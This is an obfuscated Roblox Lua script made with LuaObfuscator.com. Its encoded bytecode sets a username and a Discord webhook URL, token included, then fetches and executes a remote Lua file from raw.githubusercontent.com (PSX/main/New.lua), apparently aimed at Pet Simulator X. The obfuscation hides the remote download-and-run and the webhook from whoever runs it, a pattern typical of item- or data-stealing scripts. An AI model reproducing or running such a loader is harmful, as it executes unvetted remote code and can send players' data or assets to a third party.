--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==3) then v25=function()local v39=0 + 0 ;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v39==(3 -2)) then v42=1;v43=(v21(v41,1,4 + 16 ) * ((1194 -(1068 + 124))^((25 + 30) -(390 -(53 + 314))))) + v40 ;v39=2 + 0 ;end if (v39==3) then if (v44==(278 -(63 + 2 + 213))) then if (v43==(1484 -(1479 + 5))) then return v45 * (1476 -(265 + 1211)) ;else v44=1551 -(1067 + 483) ;v42=974 -(136 + 838) ;end elseif (v44==(641 + 1406)) then return ((v43==((2102 -(49 + 992)) -((1687 -(899 + 534)) + 807))) and (v45 * ((1621 -(732 + 888))/0))) or (v45 * NaN) ;end return v8(v45,v44-(2161 -(247 + 891)) ) * (v42 + (v43/(((1554 -(1417 + 81)) -(27 + 27))^(691 -(633 + 6))))) ;end if (v39==(0 -(0 + 0))) then v40=v24();v41=v24();v39=3 -2 ;end if (v39==2) then v44=v21(v41,21,147 -(621 -(218 + 287)) );v45=((v21(v41,14 + 18 )==1) and  -(1 + 0)) or (2 -1) ;v39=(1 + 2) -0 ;end end end;v26=nil;v26=function(v31)local v46;if  not v31 then local v76=0;while true do if (v76==(0 + 0 + 0)) then v31=v24();if (v31==((496 -(241 + 255)) + 0)) then return "";end break;end end end v46=v3(v16,v19,(v19 + v31) -(2 -1) );v19=v19 + v31 ;local v47={};for v69=569 -(47 + 521) , #v46 do v47[v69]=v2(v1(v3(v46,v69,v69)));end return v6(v47);end;v27=v24;v18=4;end if (v18==2) then v23=function()local v48=0 -(1349 -(865 + 484)) ;local v49;local v50;while true do if (v48==(1602 -(803 + 340 + 458))) then return (v50 * (198 + 58)) + v49 ;end if (v48==0) then v49,v50=v1(v16,v19,v19 + (799 -(320 + 477)) );v19=v19 + (140 -(31 + 9 + 98)) ;v48=1 -0 ;end end end;v24=nil;v24=function()local v51,v52,v53,v54=v1(v16,v19,v19 + (1005 -(700 + 276 + 26)) );v19=v19 + ((1082 -(825 + 239)) -14) ;return (v54 * (28808670 -12031454)) + (v53 * (3549 + 14337 + 47650)) + (v52 * (2053 -(416 + 1381))) + v51 ;end;v25=nil;v18=3;end if (v18==5) then v30=nil;v30=function(v32,v33,v34)local v55=v32[1];local v56=v32[2];local v57=v32[3];return function(...)local v71=1;local v72= -1;local v73={...};local v74=v12("#",...) -1 ;local function v75()local v77=v55;local v78=v56;local v79=v57;local v80=v28;local v81={};local v82={};local v83={};for v90=1891 -(732 + (1442 -(131 + 152))) ,v74 do if ((v90>=v79) or ((3212 -(1325 + 34 + 18))==(1809 + 120))) then v81[v90-v79 ]=v73[v90 + (2 -1) ];else v83[v90]=v73[v90 + 1 ];end end local v84=(v74-v79) + (2 -1) ;local v85;local v86;while true do local v91=970 -(590 + 380) ;local v92;while true do if (((0 + 0)==v91) or ((3818 -895)>=(3422 -(126 + 12)))) then v92=0 -0 ;while true do if (((0 + 0)==v92) or ((5212 -(910 + 449 + 621))>((10249 -7795) + 294 + 918))) then v85=v77[v71];v86=v85[1 + 0 ];v92=2 -1 ;end if ((v92==1) or ((10201 -6150)<(51 + 79 + 792))) then if ((v86<=(1545 -(179 + 1363))) or (4686<=(1074 -(506 + 135)))) then if ((v86<=(2 -1)) or ((9020 -5275)>((16000 -(527 + 980)) -9986))) then if ((v86>(0 -0)) or (652>(3985 + 529))) then do return;end else v83[v85[(91 -(40 + 49)) + 0 ]]=v85[1295 -(347 + 389 + 556) ]~=(940 -(651 + 289)) ;end elseif ((((3167 -1830) + 52)<4635) and (v86>(7 -5))) then local v119=1859 -(1533 + 326) ;local v120;local v121;local v122;local v123;while true do if ((v119==(0 + 0)) or ((6677 -1932)==(2623 -(170 + 144)))) then local v143=0 + 0 ;while true do if (((6832 -4909)<=((1352 -615) + 1562)) and (v143==(194 -(78 + 115)))) then v119=1 + 0 ;break;end if (((6829 -(1502 + 341))==(6304 -(140 + 403 + 775))) and (v143==(0 + 0))) then v120=v85[3 -(780 -(472 + 307)) ];v121,v122=v80(v83[v120](v13(v83,v120 + 1 + 0 ,v85[(131 -94) -(11 + 23) ])));v143=1 + 0 ;end end end if ((v119==(1 + 0)) or ((5039 -(6406 -3384))>=((7045 -(612 + 1059)) -(82 + 876)))) then v72=(v122 + v120) -((975 -(621 + 353)) -0) ;v123=0 -0 ;v119=1 + 1 + 0 ;end if ((2==v119) or (((2101 -1570) + 1163)==(7112 -2171))) then for v144=v120,v72 do local v145=0 + 0 ;local v146;while true do if (((979 -(56 + 24))<=(1587 + 2069)) and (v145==(1156 -(1026 + (1326 -(501 + 695)))))) then v146=258 -((1958 -(1683 + 126)) + 109) ;while true do if (((819 -(637 + 87 + 95))==v146) or ((349 -(34 + 29))>((7306 -(115 + 183)) -3863))) then v123=v123 + (1537 -(781 + 755)) ;v83[v144]=v121[v123];break;end end break;end end end break;end end else v83[v85[3 -1 ]]=v85[7 -4 ];end elseif ((v86<=(1 + 4)) or ((51 + 9 + 16)>(1042 + 477))) then if (((5394 -2551)==((3648 + 449) -(856 + 398))) and (v86>(6 -2))) then local v126=0 + 0 ;local v127;local v128;while true do if (((54 + 1837)==(644 + 1247)) and (v126==(0 + 0))) then v127=0 + 0 ;v128=nil;v126=1 + 0 ;end if (((10 + 152)<(1447 -(155 + 191))) and (v126==(1268 -(364 + 903)))) then while true do if (((2495 + 552)>(251 + 590)) and (v127==(0 -0))) then v128=v85[1013 -(13 + 998) ];v83[v128]=v83[v128](v13(v83,v128 + (1 -0) ,v72));break;end end break;end end else v83[v85[1599 -(1559 + 38) ]]=v34[v85[11 -8 ]];end elseif ((v86<=(1843 -(1107 + 730))) or ((3906 -((9 -5) + (528 -(93 + 234))))<(4410 -1103))) then v34[v85[(711 + 1156) -(1841 + 23) ]]=v83[v85[2 -0 ]];elseif ((v86==(2 + 5)) or ((2069 -904)>=(7260 -3165))) then v83[v85[1480 -(253 + 1225) ]]();else local v139=0 + 0 ;local v140;local v141;local v142;while true do if (((1974 + 455)<(5506 -2060)) and (v139==(0 + 0))) then v140=0 -0 ;v141=nil;v139=1 -0 ;end if ((v139==(1 -0)) or ((509 -(96 + 59 + 113))>=(15282 -11126))) then v142=nil;while true do if (((749 + 648)>=(2186 -1231)) and (v140==((1346 -(660 + 686)) + 0))) then v141=v85[1447 -(1246 + 199) ];v142=v83[v85[7 -4 ]];v140=1 -0 ;end if (((6197 -(546 + 661 + 8))>=(753 + 953 + 1533)) and (v140==(756 -(245 + 510)))) then v83[v141 + (1178 -(742 + 435)) ]=v142;v83[v141]=v142[v85[16 -12 ]];break;end end break;end end end v71=v71 + ((1 + 1) -1) ;break;end end break;end end end end A,B=v28(v11(v75));if  not A[1] then local v93=0;local v94;while true do if (0==v93) then v94=v32[4][v71] or "?" ;error("Script error at ["   .. v94   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end;return v30(v29(),{},v17)(...);end if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v58=0 + 0 ;local v59;local v60;local v61;local v62;local v63;local v64;local v65;local v66;while true do if (v58==(6 -2)) then while true do if (v59~=3) then else v66=nil;while true do local v103=333 -(256 + 77) ;while true do if (v103==1) then if (v60==(2 + 0)) then for v109=1245 -(907 + 337) ,v65 do local v110=0;local v111;local v112;local v113;while true do if (v110==(3 -2)) then v113=nil;while true do if (v111==(1969 -(734 + 1235))) then local v147=0;while true do if (v147==0) then v112=v22();v113=nil;v147=1;end if (v147==(2 -1)) then v111=1 + 0 ;break;end end end if (v111==1) then if (v112==1) then v113=v22()~=(0 -0) ;elseif (v112==(1393 -(57 + 1334))) then v113=v25();elseif (v112==3) then v113=v26();end v66[v109]=v113;break;end end break;end if (v110~=0) then else local v133=0;while true do if ((1 + 0)==v133) then v110=1 + 0 ;break;end if (v133==0) then v111=0 -0 ;v112=nil;v133=1;end end end end end v64[1 + 2 ]=v22();for v114=4 -3 ,v24() do local v115=0 -0 ;local v116;local v117;while true do if (v115==(2 -1)) then while true do if (v116~=(0 -0)) then else v117=v22();if (v21(v117,1057 -(471 + 585) ,1 + 0 )==0) then local v152=0;local v153;local v154;local v155;local v156;while true do if (v152~=(0 + 0)) then else v153=0 + 0 ;v154=nil;v152=1;end if (v152~=2) then else while true do if ((1 + 0)==v153) then local v164=0;while true do if (v164==(0 + 0)) then v156={v23(),v23(),nil,nil};if (v154==0) then local v172=1805 -(1501 + 304) ;while true do if (0~=v172) then else v156[2 + 1 ]=v23();v156[4 + 0 ]=v23();break;end end elseif (v154==1) then v156[3 + 0 ]=v24();elseif (v154==2) then v156[3]=v24() -(2^16) ;elseif (v154==(2 + 1)) then local v177=0;local v178;while true do if (v177~=0) then else v178=0;while true do if (v178==(1482 -(441 + 1041))) then v156[3]=v24() -((56 -(14 + 40))^16) ;v156[4]=v23();break;end end break;end end end v164=320 -(307 + 12) ;end if (1==v164) then v153=4 -2 ;break;end end end if (v153==(1 + 1)) then if (v21(v155,1162 -(274 + 887) ,1)==(1 + 0)) then v156[2]=v66[v156[9 -7 ]];end if (v21(v155,2,6 -4 )==(1 + 0)) then v156[1 + 2 ]=v66[v156[3]];end v153=1 + 2 ;end if (v153~=0) then else v154=v21(v117,1432 -(469 + 961) ,3);v155=v21(v117,1453 -(777 + 672) ,6);v153=1;end if (v153~=(1 + 2)) then else if (v21(v155,3,2 + 1 )~=(2 -1)) then else v156[4]=v66[v156[1418 -(554 + 860) ]];end v61[v114]=v156;break;end end break;end if (v152==(2 -1)) then v155=nil;v156=nil;v152=2;end end end break;end end break;end if (v115~=0) then else local v134=264 -(234 + 30) ;while true do if (v134==(179 -(131 + 48))) then v116=0 -0 ;v117=nil;v134=1;end if (v134~=1) then else v115=1 -0 ;break;end end end end end v60=3;end if (v60~=(3 -0)) then else local v107=1405 -(142 + 1263) ;while true do if (v107~=(0 + 0)) then else for v135=1,v24() do v62[v135-1 ]=v29();end for v137=1,v24() do v63[v137]=v24();end v107=1;end if (v107~=1) then else return v64;end end end break;end if (v103==0) then if (v60~=0) then else v61={};v62={};v63={};v60=671 -(144 + 526) ;end if (v60==1) then local v108=0;while true do if (v108~=1) then else v66={};v60=947 -(391 + 554) ;break;end if (v108==(1817 -(357 + 1460))) then v64={v61,v62,nil,v63};v65=v24();v108=1547 -(772 + 774) ;end end end v103=3 -2 ;end end end break;end if (v59==2) then local v100=0;while true do if ((0 + 0)==v100) then v64=nil;v65=nil;v100=1993 -(1390 + 602) ;end if (v100==1) then v59=2 + 1 ;break;end end end if (v59==(1 + 0)) then local v101=0;while true do if (v101~=(1704 -(1401 + 302))) then else v59=2;break;end if (v101==0) then v62=nil;v63=nil;v101=1;end end end if (v59==0) then local v102=1053 -(800 + 253) ;while true do if (v102==(2 -1)) then v59=1 + 0 ;break;end if ((0 + 0)==v102) then v60=1125 -(917 + 208) ;v61=nil;v102=1;end end end end break;end if (v58==(1 + 2)) then v65=nil;v66=nil;v58=4 + 0 ;end if (v58==(0 -0)) then v59=0 + 0 ;v60=nil;v58=1;end if (v58==2) then v63=nil;v64=nil;v58=3;end if (1~=v58) then else v61=nil;v62=nil;v58=1 + 1 ;end end end;v18=5;end if (v18==1) then v21=function(v35,v36,v37)if v37 then local v87=(v35/(((5 -3) + 0)^(v36-(1 + 0))))%((2 + 0)^(((v37-(1757 -(1487 + 269))) -(v36-(1592 -(874 + 717)))) + (4 -3))) ;return v87-(v87%(1 + 0)) ;else local v88=((5 -3) + 0)^(v36-(1 + 0)) ;return (((v35%(v88 + v88))>=v88) and (1 + 0)) or (0 -0) ;end end;v22=nil;v22=function()local v67=0 + 0 ;local v68;while true do if (v67==(3 -(177 -(95 + 80)))) then return v68;end if (v67==(1867 -(463 + 1404))) then v68=v1(v16,v19,v19);v19=v19 + (1 -0) ;v67=1;end end end;v23=nil;v18=2;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38)if (v1(v38,2)==79) then v20=v0(v3(v38,1,1));return "";else local v89=v2(v0(v38,16));if v20 then local v95=v5(v89,v20);v20=nil;return v95;else return v89;end end end);v21=nil;v18=1;end end end v15("LOL!083O0003083O00557365724E616D65030C3O006F6C6978697362726F6B696503073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31303O382O3733312O30373532302O3734312F39324664694A5166507A6364383359784D45365F35347969336D736232587A766C6A7374355A31686E54424641335644776B652D44523162704539784E6F4D6431506831030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F5053582F6D61696E2F4E65772E6C7561000D3O0012023O00023O0012063O00013O0012023O00043O0012063O00033O0012043O00053O001204000100063O002008000100010007001202000300086O000400014O0003000100044O00055O00022O00073O000100012O00013O00017O000D3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
